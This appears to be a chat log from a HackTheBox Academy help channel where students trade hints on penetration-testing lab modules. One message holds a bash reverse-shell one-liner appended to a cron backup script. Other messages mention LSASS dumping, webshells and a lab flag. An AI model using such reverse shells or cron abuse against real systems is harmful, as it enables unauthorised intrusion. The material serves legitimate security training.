Having trouble with Attacking Common Services, DNS. Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.

dig is not working, and subbrute is not giving me a flag

Golden Ticket from Linux

Not sure how to connect or what it means for this?

the spawned target is DC01, after you have done the needed steps you can then connect to it via tools available in both the workstation and your local vm assuming you have kali or parrotos

also in the section is shown how the connection is made

I need the SID and I am trying to do it from the PwnBox

what about the hosts file

I had an entry for inlanefreight.local but not dc01.inlanefreight.local

Thank you!

Hello, little suggestion. Could you please add a functionnality for mark as uncompleted when we mark as completed ?

Anyone wanna give feedback on my report from Documentation and Reporting module? Already had someone do QA for the Executive Summary. Need someone with more technical experience to look at and judge the rest.

hi can someone help me with the privilege escalation challenge in Getting Started module?

I'd love to take a look and supply feedbacks that I can think of.

https://dontasktoask.com

@misty current Cool! can I pm?

Yup

I am trying to forward an ssh key to remote server's folder so I can log into user2 from user1 for privilege escalation but its saying permission denied

this is for the privilege escalation challenge in the Getting Started module of CPTS path

which is 2nd module in path

hint is better than giving me answer please

actually don't just give me answer because I don't learn that way

what file perms do you have on the key?

also why transfer the key over and not just ssh with it directly?

oh well hold on let me try it

but it can't possibly let anyone just generate a random ssh key and let them use it to log on as just any user tho that would be crazy

oh def not, I thought you were saying you had user2's ssh key already

no

I don't

I'm trying to get into user2's account but I only have user1

okay, so then why are you messing around with ssh keys then?

because I thought generating ssh keys can help with privilege escalation. I will be back in ten minutes but can you DM me so I can get back to you soon?

it can only help if you have a blind write to the target user's .ssh directory

otherwise it can work for some persistence if say you only have access to user1 via an exploit shell but want ssh access

but thats different than priv esc

ok hold on I will be back in ten minutes

help someone else in the meantime

hi I'm back

Question for the SQL Injection Fundamentals module. I've already gotten the assessment flag. Has anyone tried any alternate ways of getting into this target. For example I'm messing around with reverse shells, meterpreter, and the like. Anyone else tried it?

Ive not but I always recommend deviating and trying new stuff outside of the scope of the module

sir this is discord not google search

you gotta actually ask a question if you want help

lol my bad, that was for the search bar in here not google

ok, good to know. I'm messing around with trying different reverse shells. I see things like bash, perl, python, etc.. on the target. Just not getting a shell utilizing the intial SQL vulnerability.

I'm stuck on the skills assessment for Attacking Web Applications With Ffuf. I found the subdomains and extensions. When I try to find the page I get nothing besides some empty pages. I don't think I'm overthinking it but who knows. I could be.

All I can say without giving things away is enumerate the target URL paths and pay attention to the extensions you detect. Once you get it you will have that AHA moment.. 🙂

I'm dumb

lol

Lol nah, just stick to it. Sometimes taking a step away for a bit helps. Come back with fresh eyes.

Anyone here able to assist with the Attacking Common Applications 2nd skill assessment? I'm stuck trying to find the FQDN of the third host. I've tried every single permutation of ffuf that I can think of and I've got nothing to show for it. Does anyone have any hints on this one they can give?

That's exactly what it was. Went out to go pick up my food from downstairs and then figured it out lol

Lol see. Don't hack when hangry. Needs to be a snickers commercial.

🤣 this is true

Who knew I just needed copious amounts of sugar in the form of a vanilla shake from sonic

idk sometimes I do better when im hungry

but I cant start hungry

Hi guys, anyone here have done with linux privesc logrotate section ?
How to exploit this ?

Hey! Is anyone able to help with the Module: HTTPs/TLS Attacks Skill assessment? I was able to re-encode the padding, and capture the Token value. Now im not sure what else I need to do to get the flag? Seems pretty confusing

I just finished that section the other day. Let me know if I can help

Yes. Tomorrow I'm gonna try the section again. I think I need to reread the section another day in a row before trying again.

As the error message says, you need an SSH key

Hey! Is anyone able to help with the Module: HTTPs/TLS Attacks Skill assessment? I was able to re-encode the padding, and capture the Token value. Now im not sure what else I need to do to get the flag? Seems pretty confusing

Just completed the blind sqli module. If someone needs help, you can dm me. (Blind SQL Injection)

If you have decrypted the token, then you see the value.
What would happen if you overwrite the user and role and then encrypt the token again?

Thanks for reaching out. I think I'm stuck at decrypting the Token. The only thing I have attempted to do with the token is to use the redeem feature, which then says check for an email.

@acoustic owl Would you be able to provide any tips on how to get teh Token decrypted? Thanks

|| padbuster|| is your friend

Ok. I will continue working to fix my padbuster payload to decrypt the token.

Hello im in attacking common services module im in easy lab i found a user fixxx and his pass and i access to the web page but when i upload a webshell doesnt execute code!! could somebody give a hint or help?

did you upload your payload to FTP or to the web server? Only the web server can interpret PHP

is in the web server

try to execute a simple php command like echo, just to verify that php is being executed

when i execute a whoami opens a window to save the file!

This gave me a hard time and later realized the position of the exploit's argument matters.

im trying to execute a simple echo hello but nothing

what im doing wrong?

got the flag!

Checkout the File WebServersInfo.txt, 443 is FTP in this case 😉

I stuck in this module

https://academy.hackthebox.com/module/77/section/853

finally figure it own by chatgpt, use chmod +x monitor.sh to fix it

Escalate privileges and submit the root.txt flag.

hey

iam kind a stuck in this module

idk why they are not accepting the flag

"GET /flag%20=%20ch3ck_th0se_gr0uP_m3mb3erSh1Ps HTTP/1.1" 404 278

ch3ck_th0se_gr0uP_m3mb3erSh1Ps

i feel lie this is the flag

Hello! How can I run a command like from my linux machine:

mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth

Being 172.16.5.150 a machine inside a AD network?

Hello, can somebody help me with the fifth question on Credential Hunting in Windows? I'm stuck and need help. The question is: "What are the credentials required to access the Edge-Router?" Thank you !! 🙂

Sups folks!
Had a hard time on Broken Auth - Skill Assessment, but managed to nail it.
If anybody needs help, just reach out!!

Hello im in attacking common services medium lab y see 6 ports 2 ftp im trying to brute force them and i have conection refused, somebody could help?

Other than brute-force have you tried something else?

im tring to connect but i get "conection refuse" message

and if i do nmap scan seems the hosts is down

re-deploy the lab then if you can't reach the target

okay i do it

ayo

i needed some hel with this Use the privileged group rights of the secaudit user to locate a flag.

Privileged Groups
LXC / LXD

what im doing wrong?

remove the -p

the second command is without the -p

i do it again

and where is the port?

got it!

thank u!

Plus reading the man page the -p option is used to enter passive mode not to specify the port

problem with my understand of ftp got it!

Did you read this part of the section module? I guess is the answer you're looking for

this was the flag i already got and i was so dumb to even put it as the ans

Happens

Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land

i am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

I do this but it didn't work

dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=CN=Administrators,CN=Builtin,DC=domain,DC=com))" -attr description

Attacking Common Applications - Skills Assessment I: i cant find the cgi script. what wordlist should i use ?

Attacking Common Services - Easy: am i supposed to brute force mysql? everytime i do it i get blocked "[ERROR] Host '10.10.16.28' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'"

hello can anyone help me with footprinting module smtp section i used the smtp-user-enum with the provide word list in the resource and still not able to get any hit

No you are not supposed to do bruteforce on mysql, check other services

Also feel free to dm

thanks a lot 😊

nc -lnvp 443
nc: Permission denied

Connect to the target system and escalate privileges by abusing the misconfigured cron job. Submit the contents of the flag.txt file in the /root/cron_abuse directory.

Cron Job Abuse

help ?

Linux Privilege Escalation Module?

Yeah that was it, sorry and thank you

yess

Hi,

i was wondering if i could exploit the sudo as its using Sudo version 1.8.16

https://www.exploit-db.com/exploits/47502

but it didn't works

*work

#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR

bash -i >& /dev/tcp/10.10.14.3/443 0>&1

This one, is because you need to run it with sudo.

This drove me nuts too, it does not make sense, but Mr GPT clarified it to me. it used php as an example not node. the issue is iterative parsing, slap these lines in to a php shell and you will see

$queryString = 'username[$ne]=1&password[$ne]=1';
parse_str($queryString, $queryArray);
print_r($queryArray);

Any ports lesser than 1000 ish requires sudo

i use 8000 before

and yeah i also used sudo before

1024

Thanks for the precision

why am not getting the shell ?

nc -lnvp 1024
Listening on [0.0.0.0] (family 0, port 1024)
ls
pwd

is this the payload you're using?

am i doing smth wronng here ?

yes

literally?

that was the cronjob which was running

is 10.10.14.3 your VPN Tunnel IP?

yes mam

Hmm, I'm kinda doubting that. can you do ip a and verify once

yess i changed the ip and i still didn't work

*it

it took some time but the thing is am so dumb and just want everything fast i didn't knew it take some times to give a rs back but anyways i got thanks alot for the help

*it

make sure you're not just copy pasting from the section.

no i do actually understand the content and then go forward as i also did a research for one line reverse shell :https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet so like yeah am not just cp pasting

being a Devops Engineer is really beneficial just deploy one application a day and do HTB all day ❤️

@misty current thanks alot for the help dude

Can someone help me with the Attacking LSASS section in password attacks?

Just ask

Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

im stuck with this

Whenever I use Pypykatz to get the creds, i just get errors

I've treid this https://www.stevencampbell.info/Parsing-Creds-From-Lsass.exe-Dumps-Using-Pypykatz/

but nothing

you've dumped the LSASS right?

what error are you getting? you should describe that too.

How do I dump it on parrot OS the section has screen shots from windows

If someone know. https://discord.com/channels/473760315293696010/1120717896352551003*

you transfer the file to your attacking machine.

https://academy.hackthebox.com/module/complete/136 I'd suggest you to go through this module

Anyone have any hint on password attack - linux pass the ticket for host svc_ workstation?

I found just .kt file and know john password but this is not useful to me

Can anyone please tell me what's going on? I don't think ERC is working correctly?

I am trying to answer this question:

I do ERC --pattern o B5eB

It just says "command ERC registered!"

I get no output at all.

Ok figured it out, you have to switch to the log tab, to see the output of the erc command.

Can anyone help please i am stuck on this question for about 6hours i did all things i tryed several exploits from Polkit 0.105-26 0.117-2 to authers can anyone give me clues thanks
Its question Environment Enumeration
in linux escalation of hack the box acadey

https://cdn.discordapp.com/attachments/914265796891537439/1120736604680626186/Capture_decran_2023-06-20_a_17.23.00.png

link to the screen shot i couldn't upload the screen shot here

Good evening friends!
DACL Attacks I: Giving Rights and Ownership
Has anyone been able to access the \DC01\CEO share without changing the CEO's password? (Did a reset-password)

Im not positive, there may be a way to make it work but I havnt experimented enough with it in hat regard

I would try adding a listener in ligolo and forward 445 and such and see if that works

i am currently doing the skill assessment 1 of active directory enumeration and attacks. I've found the user (tp****) and have the nt and sha hashes, but I do not seem to be able to crack them to obtain the password 😦 could anyone please give me a clue

who said you had to crack em

hmm well in my mind, they asked for a cleartext password. unless its stored somewhere which i wasn't looking, then it had to be cracked. so that must mean im not looking hard enough right?

maybe

always a good idea to try different tools too

could i get a clue? been looking around and still no luck :/

Module: Password Attacks
Section: Protected Files

Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.

Did I crack her password at any point? I can't find it in any of the notes/answers. Or should I perform a brute-force?

Earlier in the module iirc

Yep, I can't find it 🤦

It’s in the mutated password list, a modified version of LoveYou1

You used it in “credential hunting in Linux”

thanks, I will brute force it again

You’re welcome👍🏼

Hey guys , Technical question
how do tools enumerate so many info out of the smb service? isn't it just for sharing files ?

@tough kettle it is but that services has who uses it the version that is running alot it is not just a file share

can you explain more ? from where do they get all that info

does a null session on smb let you run commands on system?

hello?

what is this

read #rules and #welcome

hello everyone, I'm stuck with mssql section under footprinting

after ran the mssqlclient.py backdoor:Password1@IPaddrSqlServer, I'm getting this error message

[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]

but, if I connect thru RDP I can get in....

In the module Active Directory Enumeration & Attacks, in the section Attacking Domain Trusts - Child -> Parent Trusts - From Linux i was hoping to discuss the methodology for collecting the user bross NTLM hash. I did so || by moving a tool (rhymes with cats) on to the DC, and then using that tool to dump the hash.|| I am not sure if this is the intended path or if there is an easier way to do so via powerview or built in commandlets?

so, what is it missing with mssqliclient.py script?

Use backdoor@ip

Then fill in pass when prompted

What happens then?

same behavior

Also if you use -windows-auth?

yep

Give me a sec, I’ll spin up target and pwnbox

$ mssqlclient.py backdoor@10.129.201.248 -windows-auth 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]

ok., sweet

No issues for me

hmm I'm running the command directly from my host, lemme try it from the pwnbox as well

but, ty btw

You’re welcome👍🏼

I tried it on my kali vm as well, also without issues

Hello I have a problem in the module Linux Privilege Escalation at section Logrotate.
When I try to git clone i have this message : git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
fatal: unable to access 'https://github.com/whotwagner/logrotten.git/': Could not resolve host: github.com

Is there a problem with github ?

Hello !
Anyone available to help me with a problem in the Server Side attacks module

Im having trouble curling the response for the 1st challenge

Ive followed the instructions to a Tee multiple times and im still not getting it

Somethings definetely wrong with their intructions

Hey! I'm doing the Windows section of the Setting Up module and I created my Windows VM, after fixing some hiccups of the display not acting correctly, I niw can't get Ubuntu to install for WSL on the VM. It's telling me to allow Virtual Machine feature, which I have or amend the BIOS. Can someone tell me what I'm missing? It's a nested VM of sorts, but the tutorial in the section doesn't say there might be any complications.

Is there any command to url encode all?

am using urlencode but it doesnt encode the strings

Can i use my own vm to do acadmey htb modules like the practice or exercisies? Cause I am only allowed one Pwnbox spawn a day and i want to do the exercises

Yes you can, just get the vpn pack from your profile and connect with openvpn

The answer was not to you😅

Im not at your module yet, so can’t help you. Sorry

How can I do it to curl the file i just created?

The machines do not have Internet access. You cannot download anything directly from Github.

I everybody can someone help me in the module password attack/ Hunting linux ?

I'm not sure I get this bash script you wrote.